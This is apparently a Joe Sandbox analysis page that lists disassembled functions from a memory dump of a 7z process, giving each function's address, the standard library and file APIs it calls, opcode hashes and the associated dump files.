String ID:
API String ID: 210839660-0
Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
Instruction ID: 0438f3c7b9179837868a9a2d5197cb9b8f082c47e6410562c0db91848acb10d5
Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
Instruction Fuzzy Hash: 86218033104A819AC7609F55B951A9AB725F3A67F4F544322EFB943BE4CF38C896CB00

Function 00212CFC Relevance: 4.6, APIs: 3, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 001D3274: memmove.MSVCRT ref: 001D32AC

fputs.MSVCRT ref: 00212D41
fputs.MSVCRT ref: 00212DCF
free.MSVCRT ref: 00212DFF

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$fputcfreememmove
String ID:
API String ID: 1158454270-0
Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
Instruction ID: 97ff6d1841a5d2e0599ec6c648c8fb00819c09dbebfcbf4e615901af23f239f6
Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
Instruction Fuzzy Hash: 0221356261460291CF24EF25E85139E6360FBB9BE4F449222ED6F47768DF3CC595C700

Function 001DCE1C Relevance: 3.9, APIs: 3, Instructions: 178COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 001DCF85
memmove.MSVCRT ref: 001DCFB7
GetLastError.KERNEL32 ref: 001DD020

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ErrorLast$memmove
String ID:
API String ID: 3796167841-0
Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
Instruction ID: 14ae0aba2d625e4e51a1037973d22c08b822e180a559f41fe78653b3e2aee38d
Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
Instruction Fuzzy Hash: 35519373310755A7DB258F7AE6407A923A0FB44794F140627EF0E87B50DB39E8A6C740

Function 001D2300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001D2311

Strings

Kernel , xrefs: 001D2300

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputc
String ID: Kernel
API String ID: 1992160199-1736990243
Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
Instruction ID: b24ae0688e35d9ace16cdc0376c94500d2684c15dcab90ebff5042b46aee9ef6
Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
Instruction Fuzzy Hash: B7C09B5575064882EF1457B7F8453651211D75DF91F185070CE2D07350D91CD4D68711

Function 0021B1C8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0021B20D
fputs.MSVCRT ref: 0021B232

Part of subcall function 001D2B04: _CxxThrowException.MSVCRT ref: 001D2B2D
Part of subcall function 001D2B04: free.MSVCRT ref: 001D2B44

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ExceptionThrowfputsfreememset
String ID:
API String ID: 3104931167-0
Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
Instruction ID: 67f6ad4668cb7745211e4bc4e228ba8e1481d349a292728509af25ef117851e8
Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
Instruction Fuzzy Hash: 02016D777006909AE706DF6AEA8479E6760F769B94F488422DF4807711DB74D8AAC310

Function 001D8A60 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,00000003,?,001D8E1D), ref: 001D8A99
GetLastError.KERNEL32(?,?,00000003,?,001D8E1D), ref: 001D8AA6

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
Instruction ID: 2c3d5339d01f6a196ead09c9e624078ac3e2e6a5aae4466abe05602e3984a88c
Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
Instruction Fuzzy Hash: A6F0F676B117C093DF248F69D848B582361E759B98F6C4423CE1843B50DF2EC882C710

Function 00210994 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 002109D5

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

free.MSVCRT ref: 002109E9

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputcfputsfree
String ID:
API String ID: 2822829076-0
Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
Instruction ID: 5c91af377789f2dced0aa7ad3d563bf5dbceda6765cff65db8b2b6fa6ca96b01
Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
Instruction Fuzzy Hash: 80F0FE6221494480CA209F25E9553599320E7A9BF8F588321EE7D477E9DF38C9C6C610

Function 00204035 Relevance: 2.6, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 0020404D
memmove.MSVCRT ref: 00204087

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: memmove$ExceptionThrowfreemalloc
String ID:
API String ID: 1415420288-0
Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
Instruction ID: 0ec05b2c9ad13d255c109b4959ef2b37a952131d5d209defe29598fcc6afb460
Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
Instruction Fuzzy Hash: 1E3173772296C596CB31EF14E5942EEB760F7A5340F408426C79D43B66EF38D66ACB00

Function 00204054 Relevance: 2.6, APIs: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00204065
memmove.MSVCRT ref: 00204087

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: memmove$ExceptionThrowfreemalloc
String ID:
API String ID: 1415420288-0
Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
Instruction ID: 04124cdc18e975a705b0229e3cf581f70afd0d8fa405e4fe3cbda94e08549eb6
Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
Instruction Fuzzy Hash: 191196A32256C692CB31FB15F0952AEA311E7A1390F408426DB5D47BA6DF78C596CB00

Function 001F9A34 Relevance: 2.5, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F9A84
free.MSVCRT ref: 001F9A95

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
Instruction ID: d3a09df4fc8b7e945a30fab65a8a6a29392507c3659e9be4ab0befaa7856a4ee
Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
Instruction Fuzzy Hash: C5F08123302A9486DA24AA26E84026D6720AB96FB1F188321DF7917BD1DF24C857C300

Function 0021C7D4 Relevance: 2.5, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

memmove.MSVCRT ref: 0021C815
free.MSVCRT ref: 0021C81D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ExceptionThrowfreemallocmemmove
String ID:
API String ID: 1097815484-0
Opcode ID: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
Instruction ID: 8bfedf78199f96203abb5b44b3a105180d771a3f308f3582f82ca5efea1568de
Opcode Fuzzy Hash: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
Instruction Fuzzy Hash: AE018177711598CBCB14DF26D4A15ACB7A4E398F99B08C12ADF054B358CA34DC96CB90

Function 00210A1C Relevance: 2.5, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00210A42
LeaveCriticalSection.KERNEL32 ref: 00210A73

Part of subcall function 0021B480: GetTickCount.KERNEL32 ref: 0021B49E
Part of subcall function 0021B480: strcmp.MSVCRT ref: 0021B4E3
Part of subcall function 0021B480: wcscmp.MSVCRT ref: 0021B502
Part of subcall function 0021B480: strcmp.MSVCRT ref: 0021B568

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
String ID:
API String ID: 3267814326-0
Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
Instruction ID: 45cd26bed9eada7fc52e55a913da85dc63637ed51bccd7e4e248d02d2917a071
Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
Instruction Fuzzy Hash: B6F0BE72220A9082E7108F24E8883986370E748BB4F104331EE7D477E8CF3C858AC304

Function 001D2568 Relevance: 2.5, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 001D3274: memmove.MSVCRT ref: 001D32AC

free.MSVCRT ref: 001D25B5
free.MSVCRT ref: 001D25C0

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
Instruction ID: 28b300f62202594946f405c5701c32af1cbfd82de6dd38c8a591cfcb7e0d4133
Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
Instruction Fuzzy Hash: 7FE0376225854051CE20EB20E45105A6720E7F57F4B482313FABF577F9DF38C645CB10

Function 001D2130 Relevance: 2.5, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 001D2134
_CxxThrowException.MSVCRT ref: 001D214F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ExceptionThrowmalloc
String ID:
API String ID: 2436765578-0
Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
Instruction ID: 722b661f1dd57d299a448be7bf8cb935bcd84960ec8ec2a7acb861f434f370d6
Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
Instruction Fuzzy Hash: FDD01250B276C4D1DE44A75498853545760A7B9740F9450A6F66E01725DA6CC1DF8B01

Function 001E251C Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
Instruction ID: 2d75dfb740b0b7d77c11b0a3c125eb24cb897f9cef22762cfacfaf7d8103a544
Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
Instruction Fuzzy Hash: B8513672644EC496CB62CF26C4602ED3B65F389F98F6D4236DE9A4A719DF34C885C710

Function 001F86E0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SysStringByteLen.OLEAUT32 ref: 001F8744

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ByteString
String ID:
API String ID: 4236320881-0
Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
Instruction ID: 250956b53e618c9d28acb13f4df2d1ff19c2e7c419260c338a18debc6bb5c955
Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
Instruction Fuzzy Hash: E711822621878582E760AB29A5407BE7360E7847A4F644321EFDA577E4EF3CCD85C705

Function 001D8C98 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001D8A60: SetFilePointer.KERNELBASE(?,?,00000003,?,001D8E1D), ref: 001D8A99
Part of subcall function 001D8A60: GetLastError.KERNEL32(?,?,00000003,?,001D8E1D), ref: 001D8AA6

SetEndOfFile.KERNELBASE ref: 001D8CC7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: File$ErrorLastPointer
String ID:
API String ID: 841452515-0
Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
Instruction ID: a101f5f77360401881e4c10c653d9a0050dbbf1faaabc06f040bd9aab8da8633
Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
Instruction Fuzzy Hash: 06E07D12311894D3E7209FF1A5827EA8324BB457E0F488033AE4943B48CF75CCDAC710

Function 001D64D4 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D6464: FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475

LoadLibraryExW.KERNELBASE ref: 001D64F4

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: Library$FreeLoad
String ID:
API String ID: 534179979-0
Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
Instruction ID: a4937a5bb2940542fc22bed973d1d00687fe5e4e01b2e45103faab73821ccdf9
Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
Instruction Fuzzy Hash: 4ED0A722701765D6FF242BB679457A903152F16BE1E88D031DE4D43355DF694CEBE310

Function 001D8BF0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 001D8C1F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
Instruction ID: 7ecb91508108ec1b0b411114e5ad5013e617358fed525c7732b9adb22270f9ac
Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
Instruction Fuzzy Hash: BAE04676224680CBE744CF60E404B4AB3A0F398B24F000124DE8E83B54CBBCC144CF40

Function 001D6464 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
Instruction ID: 131fcfd8c411d2b98100dbef955227562d4f376632f16a06b1f13cf2102fefb8
Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
Instruction Fuzzy Hash: D5D012B2702504C5FF654FA2E85437523646B68F54F5C5011CE194A340EB2D8895C760

Function 001D8AF4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 001D8B16

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
Instruction ID: 97c64856a141aef88b86bf1721a72ee1a2d91246f5f2f8ff11606af8a831a06d
Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
Instruction Fuzzy Hash: A1D0177A614684C6E7008F60E04979AF764F398B64F480104EA8806764CBBCC199CB00

Function 001D26A0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 001D26C1

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs
String ID:
API String ID: 1795875747-0
